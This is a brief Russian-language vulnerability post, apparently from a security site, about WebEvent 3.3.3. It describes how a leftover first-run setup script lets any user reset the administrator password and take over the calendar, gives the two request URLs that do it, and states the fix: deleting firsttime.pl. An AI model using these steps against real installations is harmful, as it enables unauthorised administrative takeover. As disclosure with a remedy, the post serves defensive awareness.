WebEvent — это интерактивный WWW календарь и что-то, типа, организатора твоего распорядка дня и важных событий. Ты можешь просматривать и изменять события в календаре с любого компьютера и при помощи любого браузера. Прореха в безопасности позволяет получить привилегии администратора.

Системы уязвимы:
WebEvent version 3.3.3

Баг связан с тем, что у пользователя есть доступ к перл-файлу, который возникает при запуске программы админом в первый раз. Так что запускай этот файл и получай администратора 🙂

Эксплоит:

http://www.example.com/scripts/we3.3.3/webevent.pl?cmd=firsttime (здесь меняешь админскую инфо, пароль)

http://www.example.com/scripts/we3.3.3/webevent.pl?cmd=login (а отсюда логинишься на сервер)

Фиксим:
Решение очень простое 🙂 Надо удалить firsttime.pl после конфигурирования сервера.



Оставить мнение